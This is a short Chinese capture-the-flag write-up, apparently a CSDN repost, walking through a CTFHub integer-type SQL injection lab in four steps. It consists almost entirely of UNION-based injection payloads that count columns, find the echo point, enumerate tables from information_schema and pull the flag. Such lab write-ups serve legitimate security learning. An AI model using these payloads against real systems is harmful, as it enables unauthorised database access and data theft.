CTFHub SQL 整数型注入[四步]

判断列数

1 order by 2 

判断回显点

1 union select 1,2

判断表名列名

-1 union select 1,group_concat(table_name,'_',column_name) from information_schema.columns where table_schema=database()

在这里插入图片描述

得出结果【两种方法】

-1 union select 1,flag from sqli.flag limit 0,1
-1 union select 1,(select flag from sqli.flag limit 0,1)

在这里插入图片描述

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/luminous_you/article/details/110672254
今日推荐